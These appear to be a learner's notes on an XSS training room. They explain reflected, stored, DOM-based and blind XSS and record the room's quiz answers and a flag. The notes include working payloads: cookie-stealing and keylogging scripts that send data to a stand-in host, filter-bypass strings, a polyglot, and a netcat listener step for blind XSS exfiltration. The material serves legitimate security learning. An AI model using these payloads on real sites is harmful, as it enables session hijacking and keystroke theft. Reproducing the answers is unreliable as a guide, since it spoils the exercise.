Intro to Cross Site Scripting
Notes on XSS and Exploiting Cross-Site Scripting Vulnerabilities
TASK 1 - Room Brief
Prerequisites
- Basic understanding of JavaScript
- Understanding of Client-Server requests and responses
Introduction to XSS
- XSS (Cross-Site Scripting): An injection attack where malicious JavaScript is injected into a web application to be executed by other users.
- Types of XSS:
- Reflected XSS
- Stored XSS
- DOM-Based XSS
- Real-world examples of XSS vulnerabilities found in major applications: Shopify, Steam chat, HackerOne, Infogram.
Questions:
- What does XSS stand for?
- Answer:
Cross-site scripting
- Answer:
TASK 2 - XSS Payloads
What is a Payload?
- The JavaScript code intended to be executed on the target's computer.
- Two parts: intention and modification.
Examples of XSS Intentions
- Proof of Concept:
- Example:
<script>alert('XSS');</script>
- Example:
- Session Stealing:
- Example:
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
- Example:
- Key Logger:
- Example:
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
- Example:
- Business Logic:
- Example:
<script>user.changeEmail('attacker@hacker.thm');</script>
- Example:
Questions:
- Which document property could contain the user's session token?
- Answer:
document.cookie
- Answer:
- Which JavaScript method is often used as a Proof Of Concept?
- Answer:
alert
- Answer:
TASK 3 - Reflected XSS
Reflected XSS
- Occurs when user-supplied data in an HTTP request is included in the webpage source without validation.
Example Scenario
- Error message from the URL query string is directly included in the page source without validation.
Potential Impact
- Attackers can send malicious links to execute code on the victim's browser.
Testing for Reflected XSS
- Test possible points of entry:
- URL Query String
- URL File Path
- HTTP Headers
Questions:
- Where in an URL is a good place to test for reflected XSS?
- Answer:
parameters
- Answer:
TASK 4 - Stored XSS
Stored XSS
- The XSS payload is stored on the web application (e.g., in a database) and executed when users visit the affected page.
Example Scenario
- Comments on a blog that do not filter out malicious JavaScript.
Potential Impact
- Redirecting users, stealing session cookies, or performing actions as the user.
Testing for Stored XSS
- Test entry points where data is stored and reflected to other users:
- Blog comments
- User profile information
- Website listings
Questions:
- How are stored XSS payloads usually stored on a website?
- Answer:
database
- Answer:
TASK 5 - DOM Based XSS
What is the DOM?
- Document Object Model: Represents the page for programs to change the document structure, style, and content.
DOM Based XSS
- JavaScript execution occurs directly in the browser without loading new pages or submitting data to the backend.
Example Scenario
- JavaScript reads
window.location.hashand writes it to the page without validation.
Potential Impact
- Crafted links can redirect users or steal content from the page.
Testing for DOM Based XSS
- Look for variables controlled by attackers (e.g.,
window.location.xparameters). - Check how they are handled and if written to the DOM or passed to unsafe methods like
eval().
Questions:
- What unsafe JavaScript method is good to look for in source code?
- Answer:
eval()
- Answer:
TASK 6 - Blind XSS
Blind XSS
- Similar to Stored XSS, but the attacker cannot see the payload being executed.
Example Scenario
- Message content in a support form is not checked and is viewed by staff on a private portal.
Potential Impact
- Extracting staff portal URL, session cookies, or portal contents.
Testing for Blind XSS
- Ensure the payload has a callback (e.g., HTTP request) to know when the code is executed.
- Use tools like XSS Hunter Express for automatic capturing.
Questions:
- What tool can you use to test for Blind XSS?
- Answer:
XSS Hunter Express
- Answer:
- What type of XSS is very similar to Blind XSS?
- Answer:
Stored XSS
- Answer:
TASK 7 - Perfecting your Payload
Crafting Effective Payloads
- Depends on how the JavaScript is reflected in the target website's code.
- Example payload for a simple XSS alert:
<script>alert('THM');</script>
Testing Levels:
- Level One:
- Payload:
<script>alert('THM');</script>
- Payload:
- Level Two:
- Payload:
"><script>alert('THM');</script>
- Payload:
- Level Three:
- Payload:
</textarea><script>alert('THM');</script>
- Payload:
- Level Four:
- Payload:
';alert('THM');//
- Payload:
- Level Five:
- Payload:
<sscriptcript>alert('THM');</sscriptcript>
- Payload:
- Level Six:
- Payload:
/images/cat.jpg" onload="alert('THM');
- Payload:
Polyglots:
- A string that can escape attributes, tags, and bypass filters.
- Example:
/-//*\/'/"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
**Questions:**
1. What is the flag you received from level six?
- Answer: `THM{XSS_MASTER}`
## TASK 8 - Practical Example (Blind XSS)
### Testing Blind XSS
1. Set up a listening server using Netcat:
```bash
nc -nlvp 9001
- Craft payload to extract user's cookies and exfiltrate to the listening server.
Example of Crafting and Testing Payloads in a Practical Scenario
- Use the payload to test if it gets executed and extract useful information.
These notes cover the essentials of understanding and exploiting XSS vulnerabilities, from basic concepts to practical application and testing strategies.